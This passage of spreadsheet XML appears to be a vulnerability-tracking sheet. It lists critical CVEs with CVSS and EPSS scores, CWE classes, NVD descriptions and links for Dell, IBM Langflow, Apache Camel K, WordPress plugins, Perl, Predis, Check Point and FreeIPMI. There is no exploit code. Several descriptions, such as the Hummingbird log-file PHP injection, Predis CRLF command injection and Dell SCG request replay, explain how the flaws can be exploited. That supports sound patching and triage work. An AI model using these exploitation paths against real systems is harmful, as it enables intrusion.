        </is>
      </c>
      <c r="L262" s="5" t="inlineStr">
        <is>
          <t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t>
        </is>
      </c>
      <c r="M262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79689</t>
        </is>
      </c>
      <c r="C263" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D263" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E263" s="5" t="inlineStr"/>
      <c r="F263" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I263" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="M263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79689</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79724</t>
        </is>
      </c>
      <c r="C264" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D264" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E264" s="5" t="inlineStr"/>
      <c r="F264" s="5" t="inlineStr"/>
      <c r="G264" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L264" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary OS commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79724</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79941</t>
        </is>
      </c>
      <c r="C265" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D265" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E265" s="5" t="inlineStr"/>
      <c r="F265" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I265" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L265"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M265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79941</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80129</t>
        </is>
      </c>
      <c r="C266" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D266" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E266" s="5" t="inlineStr"/>
      <c r="F266" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I266" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L266"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M266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80129</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80131</t>
        </is>
      </c>
      <c r="C267" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D267" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E267" s="5" t="inlineStr"/>
      <c r="F267" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I267" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L267"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M267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80131</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80172</t>
        </is>
      </c>
      <c r="C268" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D268" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E268" s="5" t="inlineStr"/>
      <c r="F268" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I268" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L268" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Verification of Data Authenticity vulnerability. An unauthenticated attacker with remote access could exploit this, leading to unauthorized access. This vulnerability is considered critical as an unauthenticated attacker can repeatedly reuse a captured request to generate ADMIN access and refresh tokens. Since there is no nonce validation or time limit on requests, the attack can be performed indefinitely. Dell recommends customers to upgrade at the earliest opportunity</t>
        </is>
      </c>
      <c r="M268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80172</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80351</t>
        </is>
      </c>
      <c r="C269" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D269" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E269" s="5" t="inlineStr"/>
      <c r="F269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G269" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L269" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of directives in dynamically evaluated code ('eval injection') vulnerability in Apache Camel K.
An improper neutralization of directives in dynamically evaluated Maven configuration allows tenant-controlled repository content to influence code execution within the operator pod, potentially enabling tenants to execute arbitrary code with the privileges of the operator.
This issue affects Apache Camel K: from 2.0.0 before 2.9.3, from 2.10.1 before 2.10.2.
Users are recommended to upgrade to version 2.9.3, 2.10.2 or 2.11.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80351</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80352</t>
        </is>
      </c>
      <c r="C270" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D270" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E270" s="5" t="inlineStr"/>
      <c r="F270" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G270" s="5" t="inlineStr">
        <is>
          <t>apache, kubernetes</t>
        </is>
      </c>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L270" s="5" t="inlineStr">
        <is>
          <t>Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Camel K.
A YAML injection vulnerability in custom resource configuration allows an authorized CR author to inject arbitrary Kubernetes objects, potentially enabling unauthorized resource creation with the privileges of the operator.
This issue affects Apache Camel K: from 2.0.0 before 2.9.3, from 2.10.1 before 2.10.2.
Users are recommended to upgrade to version 2.9.3, 2.10.2 or 2.11.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80352</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81204</t>
        </is>
      </c>
      <c r="C271" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D271" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E271" s="5" t="inlineStr"/>
      <c r="F271" s="5" t="inlineStr"/>
      <c r="G271" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L271" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary code due to code injection during graph construction.</t>
        </is>
      </c>
      <c r="M271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81204</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81467</t>
        </is>
      </c>
      <c r="C272" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D272" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E272" s="5" t="inlineStr"/>
      <c r="F272" s="5" t="inlineStr"/>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L272" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10. 2616, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Command execution.</t>
        </is>
      </c>
      <c r="M272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81467</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82923</t>
        </is>
      </c>
      <c r="C273" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D273" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E273" s="5" t="inlineStr"/>
      <c r="F273" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L273" s="5" t="inlineStr">
        <is>
          <t>The AI Website Builder WordPress plugin (GitHub build) 1.0.0 does not perform any authorisation or nonce check on its REST API routes, allowing unauthenticated attackers to install and activate plugins and themes, import content from a URL under their control, write a file of their choosing into the uploads directory, and delete site content and media. On a host that serves PHP from the uploads directory, that file write is remote code execution.</t>
        </is>
      </c>
      <c r="M273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82923</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83627</t>
        </is>
      </c>
      <c r="C274" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D274" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E274" s="5" t="inlineStr"/>
      <c r="F274" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L274" s="5" t="inlineStr">
        <is>
          <t>The Hummingbird – Speed Optimization, Caching, Minify, Compress &amp; CDN plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.21.0 via the log_msg() function in core/modules/class-page-cache.php. The page-cache debug log is written to wp-content/wphb-logs/page-caching-log.php, a directly web-accessible PHP file that is supposed to be protected by a leading '&lt;?php die(); ?&gt;' header. That header is guarded by class_exists( 'Filesystem' ), which can never match because class_exists() resolves string arguments in the global namespace while the class is Hummingbird\Core\Filesystem; when the log is created during a front-end request the header is therefore omitted entirely. get_cookies() then writes the raw name of any cookie matching the wphb_cache_ prefix into that file without sanitization. This makes it possible for unauthenticated attackers to write arbitrary PHP into the log file with a single anonymous request and execute it by requesting the file directly, resulting in full remote code execution. Exploitation requires the site administrator to have enabled Page Caching with the Debug Log option (non-default), and the log file to be created during a front-end request — a state reached by the plugin's own 'Clear logs' action, any cache flush, or unattended via the plugin's daily log-rotation cron, which can strip the protective header from an existing log file.</t>
        </is>
      </c>
      <c r="M274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83627</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8376</t>
        </is>
      </c>
      <c r="C275" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D275" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E275" s="5" t="inlineStr"/>
      <c r="F275" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr">
        <is>
          <t>perl:perl</t>
        </is>
      </c>
      <c r="I275" s="5" t="inlineStr">
        <is>
          <t>2026-05-26</t>
        </is>
      </c>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr">
        <is>
          <t>CWE-680</t>
        </is>
      </c>
      <c r="L275" s="5" t="inlineStr">
        <is>
          <t>Perl versions before 5.40.5-RC1, from 5.41.0 before 5.42.3-RC1, from 5.43.0 before 5.43.11 have a heap buffer overflow when compiling regular expressions with a repeated fixed string on 32-bit builds.
Perl_study_chunk in regcomp_study.c checked the size of the joined substring buffer in characters rather than bytes. For a quantified fixed substring with a large minimum count, the byte length mincount * l could overflow SSize_t, producing an undersized SvGROW allocation; the subsequent copy writes past the end of the buffer.
A caller that compiles an attacker-controlled regular expression on a 32-bit perl build triggers a heap buffer overflow at compile time.</t>
        </is>
      </c>
      <c r="M275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8376</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84372</t>
        </is>
      </c>
      <c r="C276" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D276" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E276" s="5" t="inlineStr"/>
      <c r="F276" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G276" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr">
        <is>
          <t>Predis is a flexible and feature-complete Redis and Valkey client for PHP. From version 3.0.0-RC1 until version 3.3.0, pipeline handling on aggregate cluster and replication connections reparses an already serialized RESP buffer in AbstractAggregateConnection::write() by splitting it with explode("\r\n") instead of honoring RESP length prefixes. Attacker-controlled keys or values containing CRLF sequences can therefore be interpreted by Command::deserializeCommand() as additional commands. On cluster connections, ClusterStrategy::getFakeKey() can route injected keyless commands using the literal fake key value "key", permitting operations such as shard-wide cache deletion, targeted data modification, data reads, or node disruption. On replication connections, malformed reparsing can throw an uncaught exception and repeatedly terminate affected requests. Only pipeline() reaches this vulnerable path; transaction() and MULTI are not affected. This issue is fixed in version 3.3.0.</t>
        </is>
      </c>
      <c r="M276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84372</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85025</t>
        </is>
      </c>
      <c r="C277" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D277" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E277" s="5" t="inlineStr"/>
      <c r="F277" s="5" t="inlineStr"/>
      <c r="G277" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L277"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M277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85025</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85102</t>
        </is>
      </c>
      <c r="C278" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D278" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E278" s="5" t="inlineStr"/>
      <c r="F278" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L278" s="5" t="inlineStr">
        <is>
          <t>Improper certificate trust validation during VPN negotiation in Check Point Quantum Security Gateway may allow an unauthenticated remote attacker to execute arbitrary code on the Gateway.</t>
        </is>
      </c>
      <c r="M278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85102</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85103</t>
        </is>
      </c>
      <c r="C279" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D279" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E279" s="5" t="inlineStr"/>
      <c r="F279" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L279" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow in VPN certificate ASN.1 decoding may allow an unauthenticated remote attacker to execute arbitrary code on Check Point Quantum Security Management and Quantum Security Gateway systems.</t>
        </is>
      </c>
      <c r="M279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85103</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85504</t>
        </is>
      </c>
      <c r="C280" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D280" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E280" s="5" t="inlineStr"/>
      <c r="F280" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L280" s="5" t="inlineStr">
        <is>
          <t>FreeIPMI before 1.6.19 has a stack-based buffer overflow in _ipmi_sel_oem_fujitsu_get_sel_entry_long_text in libfreeipmi/sel/ipmi-sel-string-fujitsu-irmc-common.c via malformed Fujitsu SEL long-text responses.</t>
        </is>
      </c>
      <c r="M280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85504</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85506</t>
        </is>
      </c>
      <c r="C281" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D281" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E281" s="5" t="inlineStr"/>
      <c r="F281" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L281" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _get_dell_system_info_idrac_info in ipmi-oem/ipmi-oem-dell.c (idrac-info subcommand to dell get-system-info).</t>
        </is>
      </c>
      <c r="M281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85506</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85507</t>
        </is>
      </c>
      <c r="C282" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D282" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E282" s="5" t="inlineStr"/>
      <c r="F282" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L282" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _output_dell_system_info_cmc_info in ipmi-oem/ipmi-oem-dell.c (cmc-info subcommand to dell get-system-info).</t>
        </is>
      </c>
      <c r="M282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85507</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85508</t>
        </is>
      </c>
      <c r="C283" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D283" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E283" s="5" t="inlineStr"/>
      <c r="F283" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L283" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _output_dell_system_info_cmc_ipv6_info in ipmi-oem/ipmi-oem-dell.c (cmc-ipv6-info subcommand to dell get-system-info).</t>
        </is>
      </c>
      <c r="M283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85508</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85509</t>
        </is>
      </c>
      <c r="C284" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D284" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E284" s="5" t="inlineStr"/>
      <c r="F284" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L284" s="5" t="inlineStr">
        <is>
          <t>FreeIPMI before 1.6.19 has a stack-based buffer overflow in _read_fru_data in libfreeipmi/fru/ipmi-fru.c when a BMC returns more bytes than requested.</t>
        </is>
      </c>
      <c r="M284" s="6" t="inlineStr">
        <is>
